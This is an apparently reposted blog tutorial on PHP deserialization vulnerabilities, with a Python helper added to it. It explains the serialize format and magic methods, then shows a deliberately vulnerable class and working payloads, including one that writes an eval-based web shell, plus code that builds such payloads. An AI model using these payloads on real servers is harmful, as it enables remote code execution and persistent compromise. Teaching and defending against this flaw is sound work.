
Principles and examples of PHP deserialization vulnerability

2022-06-21 15:39:00 I am Huang Daxian yes

PHP Deserialization

Serialization and deserialization

Serialization converts an object (or any other value) into a string that can be stored or transmitted.

During serialization, properties with different visibility are written in different ways:

public properties: the property name is written as-is.
protected properties: the name is prefixed with \0*\0 (a NUL byte, an asterisk, a NUL byte), so its length grows by 3.
private properties: the name is prefixed with \0classname\0, so its length grows by the length of the class name + 2.

The NUL bytes are invisible when the serialized string is printed, which is a frequent cause of malformed hand-written payloads; when such a payload is sent in a URL, each NUL byte must be encoded as %00.

Deserialization restores the serialized string to an object so that the following code can keep using it.

PHP magic methods

__construct()   # Class constructor, called when an object is created with new (note: unserialize() does NOT call it)
__destruct()    # Destructor, called when the object is destroyed (last reference dropped, or script shutdown)
__call()        # Called when an inaccessible or undefined method is invoked on an object
__callStatic()  # Called when an inaccessible or undefined method is invoked in static context
__get()         # Called when an inaccessible or undefined property is read
__set()         # Called when an inaccessible or undefined property is written
__isset()       # Called when isset() or empty() is used on an inaccessible property
__unset()       # Called when unset() is used on an inaccessible property
__sleep()       # Called by serialize() before the object is serialized; returns the names of the properties to serialize
__wakeup()      # Called by unserialize() right after the object and its properties have been restored
__toString()    # Called when the object is used as a string
__invoke()      # Called when the object is called as a function
__set_state()   # Static method called by var_export() when an object is exported
__clone()       # Called after the object has been copied with clone
__autoload()    # Called when an undefined class is referenced (deprecated in PHP 7.2, removed in PHP 8.0; use spl_autoload_register() instead)
__debugInfo()   # Called by var_dump() to decide which properties are printed

Since PHP 7.4 a class can also define __serialize() and __unserialize(); when __unserialize() exists, unserialize() calls it instead of __wakeup(), so both must be checked when looking for a trigger.

Deserialization vulnerability

Brief introduction

The PHP deserialization vulnerability is also called PHP object injection. It is a very common class of vulnerability; although it is often somewhat difficult to exploit, a successful exploit has very dangerous consequences. The root cause is that the program passes a user-supplied string to unserialize() without validation, so the attacker controls the deserialization process (which classes are instantiated and with which property values), which leads to code execution, getshell and a series of other uncontrollable consequences. Deserialization vulnerabilities are not specific to PHP; they also exist in Java, Python and other languages, and the underlying principle is basically the same.

Principle

The serialized string entered by the user is not validated, so an attacker controls the deserialization process, which can lead to code execution, SQL injection, directory traversal and other uncontrollable consequences. The attacker cannot call arbitrary methods directly: the primitive is that certain magic methods (__wakeup(), __destruct(), __toString() and so on) are triggered automatically during or after deserialization on the objects the attacker chose, and their bodies run with attacker-controlled property values.

Trigger conditions

The argument of unserialize() is controllable; the PHP file (or the classes it includes or autoloads) contains a usable class; and that class has a magic method whose body does something exploitable with the object's properties.

Example

<?php
// Deliberately vulnerable example: the class has a __destruct() that calls
// one property as a function with another property as its argument.
class demo{
 public $name;
 public $age;
 function __destruct(){
        $a = $this->name;
        $a($this->age);   // dynamic call $name($age); both values are attacker-controlled after unserialize()
 }
}
$h = new demo();
echo serialize($h);      // prints O:4:"demo":2:{s:4:"name";N;s:3:"age";N;} so the format can be seen
unserialize($_GET['h']); // user input goes straight into unserialize(); the returned object is discarded
                         // immediately, so its __destruct() runs right here
// Note: at script shutdown $h itself is destroyed with $name still null, which raises an error,
// but by then the attacker's __destruct() has already run.
?>

payload

Payload (works whether the trigger is __destruct() or __wakeup(), as long as the method calls $name($age)):
O:4:"demo":2:{s:4:"name";s:6:"assert";s:3:"age";s:9:"phpinfo()";}
Web shell (writes shell.php next to the script; it then executes whatever is passed in the cmd parameter):
O:4:"demo":2:{s:4:"name";s:6:"assert";s:3:"age";s:64:"fputs(fopen('shell.php','w'),'<?php eval($_REQUEST["cmd"]);?>');";}
The number after s: is the exact byte length of the string that follows; if it does not match, unserialize() fails and returns false. Both payloads rely on assert() evaluating its string argument, which is deprecated since PHP 7.2 and no longer works in PHP 8.0; there, any other callable that takes a single string, such as system, serves the same purpose with $age set to the command. When the payload is sent in a URL it must be percent-encoded.

Here the object returned by unserialize() is not assigned to anything, so it is destroyed as soon as unserialize() returns and its __destruct() runs immediately, calling $this->name($this->age), i.e. assert('phpinfo()'). The attacker never calls __destruct() directly: creating the object through unserialize() and letting it reach the end of its life is what triggers the magic method. On the defensive side, unserialize() has accepted an allowed_classes option since PHP 7.0 (unserialize($data, ['allowed_classes' => false]) produces __PHP_Incomplete_Class objects instead of real ones, so no magic method of an application class runs), and user-supplied data is better exchanged in JSON than in the serialize() format.
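As an added example (not code from the original post), the following Python script implements the subset of PHP's serialization format used in this article. It covers two passages at once: the property-name mangling from the serialization section (\0*\0 for protected, \0classname\0 for private, with the resulting length changes) and the hand-written payloads above, whose s:<length> fields it verifies by parsing them back. The class name demo and the property names come from the article; the function names, the tuple representation of objects and the sample inputs are assumptions made for this example.

```python
# Added example: minimal PHP serialize()/unserialize() in Python, with the
# visibility mangling that PHP applies to property names and strict length
# checks on every s:<len>:"..." element (the usual mistake in hand-made payloads).
from urllib.parse import quote

PUBLIC, PROTECTED, PRIVATE = "public", "protected", "private"


def mangle(name: str, visibility: str, classname: str) -> str:
    """Return the property name exactly as PHP's serialize() writes it."""
    if visibility == PUBLIC:
        return name
    if visibility == PROTECTED:
        return "\0*\0" + name                   # length grows by 3
    if visibility == PRIVATE:
        return "\0" + classname + "\0" + name   # length grows by len(classname) + 2
    raise ValueError(f"unknown visibility {visibility!r}")


def php_serialize(value) -> str:
    """Serialize a Python value into PHP's format.

    Objects are given as ("ClassName", [(name, visibility, value), ...]).
    String lengths are UTF-8 byte lengths, which is what PHP counts.
    """
    if value is None:
        return "N;"
    if isinstance(value, bool):                 # before int: True is an int
        return f"b:{int(value)};"
    if isinstance(value, int):
        return f"i:{value};"
    if isinstance(value, float):
        return f"d:{value!r};"
    if isinstance(value, str):
        return f's:{len(value.encode())}:"{value}";'
    if isinstance(value, dict):
        body = "".join(php_serialize(k) + php_serialize(v) for k, v in value.items())
        return f"a:{len(value)}:{{{body}}}"
    if isinstance(value, tuple) and len(value) == 2:
        classname, props = value
        body = "".join(php_serialize(mangle(n, vis, classname)) + php_serialize(v)
                       for n, vis, v in props)
        return f'O:{len(classname.encode())}:"{classname}":{len(props)}:{{{body}}}'
    raise TypeError(f"unsupported type {type(value).__name__}")


def url_payload(serialized: str) -> str:
    """Percent-encode a payload for a GET parameter; NUL bytes become %00."""
    return quote(serialized, safe="")


def php_unserialize(data: str):
    """Parse PHP-serialized data; objects come back as ("ClassName", {mangled_name: value}).

    Raises ValueError on any length or delimiter mismatch instead of silently
    accepting a malformed payload.
    """
    raw = data.encode()
    value, pos = _parse(raw, 0)
    if pos != len(raw):
        raise ValueError(f"trailing data at offset {pos}")
    return value


def _expect(data: bytes, pos: int, token: bytes) -> None:
    if data[pos:pos + len(token)] != token:
        raise ValueError(f"expected {token!r} at offset {pos}")


def _parse(data: bytes, pos: int):
    tag = data[pos:pos + 1]
    if tag == b"N":
        _expect(data, pos + 1, b";")
        return None, pos + 2
    if tag in (b"b", b"i", b"d"):
        end = data.index(b";", pos)
        conv = {b"b": lambda r: r == b"1", b"i": int, b"d": float}[tag]
        return conv(data[pos + 2:end]), end + 1
    if tag == b"s":
        colon = data.index(b":", pos + 2)
        length = int(data[pos + 2:colon])
        start = colon + 2                       # skip :"
        _expect(data, start + length, b'";')    # declared length must land exactly on ";
        return data[start:start + length].decode(), start + length + 2
    if tag in (b"a", b"O"):
        classname = None
        colon = data.index(b":", pos + 2)
        if tag == b"O":
            name_len = int(data[pos + 2:colon])
            classname = data[colon + 2:colon + 2 + name_len].decode()
            pos = colon + 2 + name_len + 2      # skip the ": after the class name
            colon = data.index(b":", pos)
        else:
            pos = pos + 2
        count = int(data[pos:colon])
        pos = colon + 2                         # skip :{
        items = {}
        for _ in range(count):
            key, pos = _parse(data, pos)
            items[key], pos = _parse(data, pos)
        _expect(data, pos, b"}")
        return ((classname, items) if tag == b"O" else items), pos + 1
    raise ValueError(f"unknown tag {tag!r} at offset {pos}")


if __name__ == "__main__":
    demo = ("demo", [("name", PUBLIC, "assert"), ("age", PUBLIC, "phpinfo()")])
    print(php_serialize(demo))                  # the article's first payload
    print(url_payload(php_serialize(("demo", [("age", PROTECTED, 1)]))))
```

Running the script prints the article's first payload byte for byte, and the second line shows why a protected property has to be delivered percent-encoded: the two NUL bytes appear as %00 and would otherwise be dropped or mangled by the browser or the server. Feeding a payload with a wrong s: length into php_unserialize() raises ValueError at the offending offset, which is quicker than guessing why PHP returned false.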

General process :


Copyright notice
This article was written by [I am Huang Daxian yes]; when reposting, please include the original link. Thank you.
https://yzsam.com/2022/02/202202221140565746.html
